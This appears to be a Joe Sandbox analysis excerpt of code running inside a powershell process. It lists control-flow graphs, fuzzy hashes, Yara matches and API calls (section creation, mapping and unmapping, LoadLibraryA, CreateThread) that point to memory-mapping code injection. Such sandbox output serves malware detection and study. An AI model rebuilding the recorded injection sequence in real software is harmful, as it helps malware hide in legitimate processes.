                                        execution_graph 18716 7ffaac51ddbd 18717 7ffaac51ddcd CreateThread 18716->18717 18719 7ffaac51dec3 18717->18719 18720 1df1c78d4dc 18721 1df1c78d4f8 18720->18721 18722 1df1c78d57d NtMapViewOfSection 18721->18722 18735 1df1c78dc84 18721->18735 18723 1df1c78d5d1 18722->18723 18726 1df1c78d8ad 18723->18726 18723->18735 18736 1df1c78e408 18723->18736 18740 1df1c78e4f0 18723->18740 18725 1df1c78e408 LoadLibraryA 18725->18726 18726->18725 18728 1df1c78d94c 18726->18728 18729 1df1c78e4f0 LoadLibraryA 18726->18729 18730 1df1c78da7b NtUnmapViewOfSection 18728->18730 18733 1df1c78daff 18728->18733 18729->18726 18731 1df1c78da93 NtMapViewOfSection 18730->18731 18730->18735 18731->18733 18731->18735 18733->18735 18744 1df1c78e1ac 18733->18744 18737 1df1c78e426 18736->18737 18738 1df1c78e4d1 LoadLibraryA 18737->18738 18739 1df1c78e4d9 18737->18739 18738->18739 18739->18723 18741 1df1c78e660 18740->18741 18742 1df1c78e526 18740->18742 18741->18723 18742->18741 18748 1df1c78c35c 18742->18748 18747 1df1c78e1e8 18744->18747 18745 1df1c78e3e4 18745->18735 18746 1df1c78e4f0 LoadLibraryA 18746->18747 18747->18745 18747->18746 18749 1df1c78c3c8 18748->18749 18753 1df1c78c39f 18748->18753 18750 1df1c78e408 LoadLibraryA 18749->18750 18752 1df1c78c3d8 18749->18752 18750->18752 18751 1df1c78e4f0 LoadLibraryA 18751->18753 18752->18741 18753->18749 18753->18751 18753->18752 18754 1df1c78d4bf NtCreateSection 18755 1df1c78d4d7 NtMapViewOfSection 18754->18755 18769 1df1c78dc84 18754->18769 18760 1df1c78d5d1 18755->18760 18757 1df1c78e408 LoadLibraryA 18757->18760 18758 1df1c78e408 LoadLibraryA 18759 1df1c78d8ad 18758->18759 18759->18758 18762 1df1c78d94c 18759->18762 18763 1df1c78e4f0 LoadLibraryA 18759->18763 18760->18757 18760->18759 18761 1df1c78e4f0 LoadLibraryA 18760->18761 18760->18769 18761->18760 18764 1df1c78da7b NtUnmapViewOfSection 18762->18764 18767 1df1c78daff 18762->18767 18763->18759 18765 1df1c78da93 NtMapViewOfSection 18764->18765 18764->18769 18765->18767 18765->18769 18768 1df1c78e1ac LoadLibraryA 18767->18768 18767->18769 18768->18769

                                        Executed Functions

                                        Function 000001DF1C78D4BF Relevance: 6.9, APIs: 4, Instructions: 938nativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 1df1c78d4bf-1df1c78d4d1 NtCreateSection 1 1df1c78d4d7-1df1c78d5cf NtMapViewOfSection 0->1 2 1df1c78dd76-1df1c78dd89 0->2 5 1df1c78d5dc-1df1c78d5df 1->5 6 1df1c78d5d1-1df1c78d5d6 1->6 5->2 7 1df1c78d5e5-1df1c78d5e8 5->7 6->2 6->5 8 1df1c78d5ea-1df1c78d64d call 1df1c78ec18 call 1df1c78ec38 7->8 9 1df1c78d64f-1df1c78d660 7->9 10 1df1c78d664-1df1c78d695 call 1df1c78ec18 8->10 9->10 15 1df1c78d697-1df1c78d69c 10->15 16 1df1c78d6e9-1df1c78d6ff 10->16 20 1df1c78d69e-1df1c78d6da call 1df1c78ec18 15->20 17 1df1c78d7f7-1df1c78d801 16->17 18 1df1c78d705-1df1c78d708 16->18 22 1df1c78d807-1df1c78d80e 17->22 23 1df1c78d8bd-1df1c78d8c7 17->23 18->17 24 1df1c78d70e-1df1c78d725 18->24 32 1df1c78d6dc-1df1c78d6e3 20->32 22->23 27 1df1c78d814-1df1c78d815 22->27 28 1df1c78d8cd-1df1c78d8d8 23->28 29 1df1c78d953-1df1c78d968 23->29 24->17 30 1df1c78d72b-1df1c78d72c 24->30 33 1df1c78d81b-1df1c78d83d call 1df1c78e408 27->33 35 1df1c78d8da-1df1c78d8f6 call 1df1c78e408 28->35 36 1df1c78d951 28->36 34 1df1c78d96b-1df1c78d9bb 29->34 37 1df1c78d731-1df1c78d735 30->37 32->16 47 1df1c78d83f-1df1c78d847 33->47 34->34 40 1df1c78d9bd-1df1c78da0e call 1df1c78ec18 34->40 49 1df1c78d8f8-1df1c78d905 35->49 50 1df1c78d942-1df1c78d94a 35->50 36->29 37->17 42 1df1c78d73b-1df1c78d749 37->42 71 1df1c78da68-1df1c78da6f 40->71 72 1df1c78da10-1df1c78da17 40->72 45 1df1c78d7e7-1df1c78d7f1 42->45 46 1df1c78d74f 42->46 45->17 45->37 51 1df1c78d754-1df1c78d765 46->51 53 1df1c78d849 47->53 54 1df1c78d89e-1df1c78d8a7 47->54 56 1df1c78d93a-1df1c78d940 49->56 50->35 52 1df1c78d94c-1df1c78d94d 50->52 57 1df1c78d767-1df1c78d77d 51->57 58 1df1c78d7d4-1df1c78d7e1 51->58 52->36 60 1df1c78d84b-1df1c78d851 53->60 61 1df1c78d853-1df1c78d85b 53->61 54->33 59 1df1c78d8ad-1df1c78d8b9 54->59 56->50 65 1df1c78d907 56->65 63 1df1c78d77f-1df1c78d782 57->63 64 1df1c78d784-1df1c78d78c 57->64 58->45 58->51 59->23 70 1df1c78d87f-1df1c78d885 call 1df1c78e4f0 60->70 68 1df1c78d877-1df1c78d87b 61->68 69 1df1c78d85d-1df1c78d86c call 1df1c78c89c 61->69 75 1df1c78d7ba-1df1c78d7c6 63->75 66 1df1c78d78e-1df1c78d791 64->66 67 1df1c78d793-1df1c78d79b 64->67 73 1df1c78d909-1df1c78d90f 65->73 74 1df1c78d911-1df1c78d919 65->74 78 1df1c78d7b7-1df1c78d7b8 66->78 79 1df1c78d7a9-1df1c78d7b1 67->79 80 1df1c78d79d-1df1c78d7a7 67->80 68->70 69->68 95 1df1c78d86e-1df1c78d875 69->95 90 1df1c78d88a-1df1c78d89c 70->90 76 1df1c78daff-1df1c78db21 71->76 77 1df1c78da75-1df1c78da8d NtUnmapViewOfSection 71->77 83 1df1c78da19-1df1c78da40 call 1df1c78ec38 * 2 72->83 84 1df1c78da42-1df1c78da4a 72->84 85 1df1c78d91b-1df1c78d938 call 1df1c78e4f0 73->85 74->85 75->58 105 1df1c78db27-1df1c78db3a 76->105 106 1df1c78dc12-1df1c78dc4c 76->106 77->2 104 1df1c78da93-1df1c78daf9 NtMapViewOfSection 77->104 78->75 87 1df1c78d7c8-1df1c78d7cb 79->87 88 1df1c78d7b3-1df1c78d7b4 79->88 80->78 101 1df1c78da63-1df1c78da64 83->101 84->71 86 1df1c78da4c-1df1c78da5e call 1df1c78ec18 84->86 85->56 86->101 96 1df1c78dd09-1df1c78dd0c 87->96 97 1df1c78d7d1-1df1c78d7d2 87->97 88->78 90->47 95->90 102 1df1c78dd0e-1df1c78dd32 96->102 103 1df1c78dd61-1df1c78dd6f 96->103 97->58 101->71 120 1df1c78dd40-1df1c78dd57 102->120 121 1df1c78dd34-1df1c78dd3b 102->121 103->2 108 1df1c78dd71 call 1df1c78ec38 103->108 104->2 104->76 109 1df1c78db3e-1df1c78db55 105->109 118 1df1c78dc4e-1df1c78dc56 106->118 119 1df1c78dc75-1df1c78dc7e 106->119 108->2 114 1df1c78db5b-1df1c78db5e 109->114 115 1df1c78dbf5-1df1c78dbff 109->115 116 1df1c78db67-1df1c78db75 114->116 117 1df1c78db60-1df1c78db65 114->117 115->109 122 1df1c78dc05-1df1c78dc0c 115->122 124 1df1c78db77-1df1c78db87 116->124 125 1df1c78db89-1df1c78db96 116->125 123 1df1c78dbad-1df1c78dbc1 117->123 118->119 126 1df1c78dc58 118->126 127 1df1c78dc84-1df1c78dc99 119->127 128 1df1c78ddf6-1df1c78de00 119->128 120->103 121->120 122->106 132 1df1c78dbc3-1df1c78dbd3 123->132 133 1df1c78dbd5 123->133 124->123 130 1df1c78db98-1df1c78db9d 125->130 131 1df1c78db9f-1df1c78dbaa 125->131 129 1df1c78dc6d-1df1c78dc73 126->129 143 1df1c78de69-1df1c78de70 127->143 144 1df1c78dc9f-1df1c78dcaf 127->144 135 1df1c78de30-1df1c78de34 128->135 136 1df1c78de02-1df1c78de2b call 1df1c78e1ac 128->136 129->119 139 1df1c78dc5a-1df1c78dc6a 129->139 130->123 131->123 140 1df1c78dbd8-1df1c78dbf0 132->140 133->140 137 1df1c78de72-1df1c78de82 135->137 138 1df1c78de36-1df1c78de52 135->138 136->135 149 1df1c78de60-1df1c78de67 137->149 138->149 154 1df1c78de54-1df1c78de58 138->154 139->129 140->115 143->149 152 1df1c78de84-1df1c78de85 144->152 153 1df1c78dcb5-1df1c78dcba 144->153 155 1df1c78de8b-1df1c78de96 149->155 152->155 153->152 156 1df1c78dcc0-1df1c78dcd2 153->156 154->149 155->96 158 1df1c78de9c-1df1c78dea9 155->158 157 1df1c78dcd4-1df1c78dcf8 call 1df1c78ec54 156->157 162 1df1c78dd8a-1df1c78dd95 157->162 163 1df1c78dcfe-1df1c78dd00 157->163 158->96 164 1df1c78dd02-1df1c78dd03 162->164 165 1df1c78dd9b-1df1c78ddaf 162->165 163->157 163->164 164->96 166 1df1c78ddf2-1df1c78ddf4 165->166 167 1df1c78ddb1-1df1c78ddb8 165->167 166->149 168 1df1c78ddba-1df1c78ddd7 167->168 169 1df1c78dddc-1df1c78ddf0 167->169 168->169 169->149
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DF1C3C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1c3c0000_powershell.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Section$View$CreateUnmap
                                        • String ID:
                                        • API String ID: 3892452295-0
                                        • Opcode ID: c2efb0d189a3bd31cd61209ebe84e47c4058fee6307bf13583288c5a38d8a1c7
                                        • Instruction ID: 3664d628f9cc63121fff74ff21243402218c3a0c543f3d0644cb9a3e7ec305f7
                                        • Opcode Fuzzy Hash: c2efb0d189a3bd31cd61209ebe84e47c4058fee6307bf13583288c5a38d8a1c7
                                        • Instruction Fuzzy Hash: 1562C830618B49CBDB69DF29D8857E9B7E1FB68300F14462ED94BC7281DB74EA42C742
                                        Function 000001DF1C78D4DC Relevance: 1.8, APIs: 1, Instructions: 340nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DF1C3C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1c3c0000_powershell.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SectionView
                                        • String ID:
                                        • API String ID: 1323581903-0
                                        • Opcode ID: 24a29ad4ea641c494988e496a702fc89e757b0270e033edaa018779348e7e818
                                        • Instruction ID: 16db26333ad66747411e744040a1974564ca4a83fe1aef774533dbaafee1fb9c
                                        • Opcode Fuzzy Hash: 24a29ad4ea641c494988e496a702fc89e757b0270e033edaa018779348e7e818
                                        • Instruction Fuzzy Hash: BCB1B631218B49CBDB68DF29D8857E9B7E1FBA8310F54463ED54BC3281DA74E6438B42
                                        Function 000001DF1C78E408 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 172 1df1c78e408-1df1c78e424 173 1df1c78e43f-1df1c78e44e 172->173 174 1df1c78e426-1df1c78e42a 172->174 176 1df1c78e47a-1df1c78e48c 173->176 177 1df1c78e450-1df1c78e475 173->177 174->173 175 1df1c78e42c-1df1c78e43d 174->175 175->173 175->174 178 1df1c78e48f-1df1c78e496 176->178 177->176 179 1df1c78e498-1df1c78e4a7 178->179 180 1df1c78e4d1-1df1c78e4d6 LoadLibraryA 178->180 182 1df1c78e4a9-1df1c78e4c2 call 1df1c78ec74 179->182 183 1df1c78e4c4-1df1c78e4ca 179->183 181 1df1c78e4d9-1df1c78e4e8 180->181 182->183 187 1df1c78e4e9-1df1c78e4ec 182->187 183->178 185 1df1c78e4cc-1df1c78e4cf 183->185 185->180 185->181 187->181
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DF1C3C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1c3c0000_powershell.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: l
                                        • API String ID: 1029625771-2517025534
                                        • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                        • Instruction ID: 2724de3898c1fb819baafc1d782685d23dbebc2c51001a76d55c832fc2cea441
                                        • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                        • Instruction Fuzzy Hash: BA31AD34518A858EE795DB29D044B62BBD4FBA9308F244ABDD1DFC3192D760D8468701
                                        Function 00007FFAAC51DDBD Relevance: 1.7, APIs: 1, Instructions: 153threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 367 7ffaac51ddbd-7ffaac51ddcb 368 7ffaac51ddcd 367->368 369 7ffaac51ddce-7ffaac51ddd9 367->369 368->369 370 7ffaac51dddb 369->370 371 7ffaac51dde1 369->371 370->371 372 7ffaac51dde3 371->372 373 7ffaac51dde4-7ffaac51dded 371->373 372->373 374 7ffaac51ddef 373->374 375 7ffaac51ddf5 373->375 374->375 376 7ffaac51ddf7 375->376 377 7ffaac51ddf8-7ffaac51dec1 CreateThread 375->377 376->377 382 7ffaac51dec3 377->382 383 7ffaac51dec9-7ffaac51def1 377->383 382->383
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2137329798.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_7ffaac510000_powershell.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 66f68670029462f41dcb0f36a4c0d879ed606e2767d28dece83dd5d1fe5540dc
                                        • Instruction ID: ec55965fad1e5039e464ac5deff6bba4f876a689a5cbba49269b2f405a4dc9ff
                                        • Opcode Fuzzy Hash: 66f68670029462f41dcb0f36a4c0d879ed606e2767d28dece83dd5d1fe5540dc
                                        • Instruction Fuzzy Hash: C8415D7091C78D8FDB1AEB6898156E97FE4EF56321F04426FE08EC3153CA28A855C7C2
                                        Function 00007FFAAC5E041D Relevance: .4, Instructions: 450COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 385 7ffaac5e041d-7ffaac5e04a4 389 7ffaac5e0659-7ffaac5e0697 385->389 390 7ffaac5e04aa-7ffaac5e04b4 385->390 408 7ffaac5e0699-7ffaac5e06b3 389->408 409 7ffaac5e062b-7ffaac5e0656 389->409 391 7ffaac5e04b6-7ffaac5e04c3 390->391 392 7ffaac5e04cd-7ffaac5e04d2 390->392 391->392 402 7ffaac5e04c5-7ffaac5e04cb 391->402 393 7ffaac5e04d8-7ffaac5e04db 392->393 394 7ffaac5e05fa-7ffaac5e0604 392->394 397 7ffaac5e04f2-7ffaac5e04f6 393->397 398 7ffaac5e04dd-7ffaac5e04e6 393->398 400 7ffaac5e0606-7ffaac5e0612 394->400 401 7ffaac5e0613-7ffaac5e0629 394->401 397->394 410 7ffaac5e04fc-7ffaac5e0533 397->410 398->397 401->409 402->392 416 7ffaac5e06b5-7ffaac5e06dc 408->416 417 7ffaac5e06de-7ffaac5e0709 408->417 409->389 426 7ffaac5e0557 410->426 427 7ffaac5e0535-7ffaac5e0555 410->427 416->417 428 7ffaac5e070b 417->428 429 7ffaac5e070c-7ffaac5e071d 417->429 430 7ffaac5e0559-7ffaac5e055b 426->430 427->430 428->429 431 7ffaac5e071f 429->431 432 7ffaac5e0720-7ffaac5e07e0 429->432 430->394 434 7ffaac5e0561-7ffaac5e0564 430->434 431->432 434->394 437 7ffaac5e056a-7ffaac5e05a4 434->437 451 7ffaac5e05a6-7ffaac5e05be 437->451 452 7ffaac5e05c0-7ffaac5e05c3 437->452 451->452 454 7ffaac5e05ca-7ffaac5e05d3 452->454 457 7ffaac5e05d5-7ffaac5e05e2 454->457 458 7ffaac5e05ec-7ffaac5e05f9 454->458 457->458 460 7ffaac5e05e4-7ffaac5e05ea 457->460 460->458
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2138935254.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_7ffaac5e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 433b78d29b049963e072b37a2fe0db2640f6e01bc9e4b5d10891cb40a3d59e03
                                        • Instruction ID: 347d99fa12def8882a6566f6683b66468ba6a919a5789402908ac90217c2c928
                                        • Opcode Fuzzy Hash: 433b78d29b049963e072b37a2fe0db2640f6e01bc9e4b5d10891cb40a3d59e03
                                        • Instruction Fuzzy Hash: 60D1F66294EBC68FF796977858651B57FE4EF97210B0841FBE08EC7093DA089C49C392
                                        Function 00007FFAAC5E04EA Relevance: .1, Instructions: 121COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2138935254.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_7ffaac5e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30bcd952c276ae035f338638d81ca497310644ae69c9def3fb57995c0e08d246
                                        • Instruction ID: e62d68568d3dfde8a21b67806d009768783bcfd0f22a1028f8a388bcb99ed1a1
                                        • Opcode Fuzzy Hash: 30bcd952c276ae035f338638d81ca497310644ae69c9def3fb57995c0e08d246
                                        • Instruction Fuzzy Hash: 6431B693E5FB878BF7A5636848652BD56C4EF8626075840BBE44EC30D3EF0CE8499381

                                        Non-executed Functions

                                        Function 000001DF1D2C7860 Relevance: 5.5, Strings: 4, Instructions: 477COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 620 1df1d2c7860-1df1d2c7948 621 1df1d2c794d-1df1d2c7d2b 620->621 621->621 622 1df1d2c7d31-1df1d2c7e1e 621->622
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2094010428.000001DF1D2C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001DF1D2C1000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1d2c1000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$expa$nd 3$te k
                                        • API String ID: 0-3581043453
                                        • Opcode ID: 9face80e684f4cb5f1989056d9a63c8b1ed90f8923185a9084afd145ce759664
                                        • Instruction ID: 2d5b7ae2bc73a75ad5455e3c1db5f3912dee661aad735c78aa7ebcf1a411cd23
                                        • Opcode Fuzzy Hash: 9face80e684f4cb5f1989056d9a63c8b1ed90f8923185a9084afd145ce759664
                                        • Instruction Fuzzy Hash: 8DC1532493AB4C1EE3C3BA298501253F344FE6E54DA20D366DE57B8491EB1FE88F610C
                                        Function 000001DF1D324F20 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2094010428.000001DF1D2C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001DF1D2C1000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1d2c1000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7deb9fe0b22ac6d43d1f22b99f431206e1cdecd252482b38c830d55032bd970
                                        • Instruction ID: 7ce0e9b55abf2c8f6b4acde36312dc77076acdfe4adea1430ce82e677323860b
                                        • Opcode Fuzzy Hash: d7deb9fe0b22ac6d43d1f22b99f431206e1cdecd252482b38c830d55032bd970
                                        • Instruction Fuzzy Hash: CAC0807181569959F351C75C4C403E47EE0D7D4351F44C0AED145C01D1D26D82C15144
                                        Function 000001DF1D2CBF60 Relevance: 9.0, Strings: 7, Instructions: 289COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 531 1df1d2cbf60-1df1d2cbf64 532 1df1d2cbf6a-1df1d2cbf8f call 1df1d3121e0 531->532 533 1df1d2cc26f-1df1d2cc274 call 1df1d323100 531->533 538 1df1d2cbf91-1df1d2cbfa5 532->538 539 1df1d2cbfc2-1df1d2cbfe4 call 1df1d311e40 532->539 533->531 541 1df1d2cbfa7-1df1d2cbfb0 call 1df1d3250c0 538->541 542 1df1d2cbfb2-1df1d2cbfc1 538->542 545 1df1d2cbfea-1df1d2cbfee 539->545 546 1df1d2cc0a5-1df1d2cc0a9 539->546 541->542 548 1df1d2cc045-1df1d2cc049 545->548 549 1df1d2cbff0-1df1d2cc003 545->549 550 1df1d2cc147-1df1d2cc14b 546->550 551 1df1d2cc0af-1df1d2cc0b3 546->551 556 1df1d2cc1ac-1df1d2cc1b0 548->556 558 1df1d2cc04f-1df1d2cc063 548->558 552 1df1d2cc023 549->552 553 1df1d2cc005-1df1d2cc00b 549->553 550->556 557 1df1d2cc14d-1df1d2cc15d 550->557 554 1df1d2cc10b-1df1d2cc11b 551->554 555 1df1d2cc0b5-1df1d2cc0c5 551->555 552->556 563 1df1d2cc029-1df1d2cc02f 552->563 561 1df1d2cc00d-1df1d2cc011 553->561 562 1df1d2cc020-1df1d2cc021 553->562 559 1df1d2cc11d-1df1d2cc124 554->559 560 1df1d2cc134 554->560 564 1df1d2cc0c7-1df1d2cc0ce 555->564 565 1df1d2cc0e3 555->565 566 1df1d2cc1f8-1df1d2cc21d call 1df1d311da0 556->566 567 1df1d2cc1b2-1df1d2cc1d9 556->567 568 1df1d2cc178 557->568 569 1df1d2cc15f-1df1d2cc166 557->569 570 1df1d2cc075 558->570 571 1df1d2cc065-1df1d2cc06c 558->571 573 1df1d2cc126-1df1d2cc12a 559->573 574 1df1d2cc131-1df1d2cc132 559->574 560->556 577 1df1d2cc136-1df1d2cc13d 560->577 575 1df1d2cc017-1df1d2cc01a 561->575 576 1df1d2cc1a6-1df1d2cc1ab 561->576 562->552 563->556 578 1df1d2cc035-1df1d2cc039 563->578 586 1df1d2cc0e0-1df1d2cc0e1 564->586 587 1df1d2cc0d0-1df1d2cc0d4 564->587 565->556 590 1df1d2cc0e9-1df1d2cc0f0 565->590 605 1df1d2cc225-1df1d2cc23c call 1df1d312ce0 566->605 606 1df1d2cc21f-1df1d2cc223 566->606 588 1df1d2cc1db-1df1d2cc1e6 call 1df1d3250c0 567->588 589 1df1d2cc1e8-1df1d2cc1f7 567->589 582 1df1d2cc17a-1df1d2cc181 568->582 583 1df1d2cc193 568->583 579 1df1d2cc168-1df1d2cc16e 569->579 580 1df1d2cc175-1df1d2cc176 569->580 584 1df1d2cc077-1df1d2cc080 570->584 585 1df1d2cc089 570->585 571->576 581 1df1d2cc072-1df1d2cc073 571->581 573->576 592 1df1d2cc12c-1df1d2cc12f 573->592 574->560 575->552 577->556 593 1df1d2cc13f-1df1d2cc143 577->593 578->576 594 1df1d2cc03f-1df1d2cc040 578->594 579->576 595 1df1d2cc170-1df1d2cc173 579->595 580->568 581->570 596 1df1d2cc183-1df1d2cc189 582->596 597 1df1d2cc190-1df1d2cc191 582->597 583->556 600 1df1d2cc195-1df1d2cc19c 583->600 584->576 598 1df1d2cc086-1df1d2cc087 584->598 585->556 599 1df1d2cc08f-1df1d2cc096 585->599 586->565 587->576 601 1df1d2cc0da-1df1d2cc0dd 587->601 588->589 590->556 603 1df1d2cc0f6-1df1d2cc100 590->603 592->560 593->576 607 1df1d2cc145 593->607 594->556 595->568 596->576 608 1df1d2cc18b-1df1d2cc18e 596->608 597->583 598->585 599->576 609 1df1d2cc09c-1df1d2cc0a0 599->609 600->556 610 1df1d2cc19e-1df1d2cc1a4 600->610 601->565 603->576 604 1df1d2cc106 603->604 604->556 614 1df1d2cc23e-1df1d2cc252 605->614 615 1df1d2cc269-1df1d2cc26e 605->615 606->605 607->556 608->583 609->556 610->556 610->576 616 1df1d2cc254-1df1d2cc25d call 1df1d3250c0 614->616 617 1df1d2cc25f-1df1d2cc267 614->617 616->617 617->615
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2094010428.000001DF1D2C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001DF1D2C1000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_1df1d2c1000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: debu$debu$debu$debu$debu$l655$runt
                                        • API String ID: 0-120812121
                                        • Opcode ID: c56935a0eb90631a5f2efc0543069aa2723d47141d10be997a949776721356df
                                        • Instruction ID: da30d08f4427348e4158a09a7e98d5946da8289fa03f814b687fdcae3f290e1f
                                        • Opcode Fuzzy Hash: c56935a0eb90631a5f2efc0543069aa2723d47141d10be997a949776721356df
                                        • Instruction Fuzzy Hash: E9A19530544584CEEBA8FB1DC998BA476F1FB9A394F68C46EC41BC71E5D2A18E82D701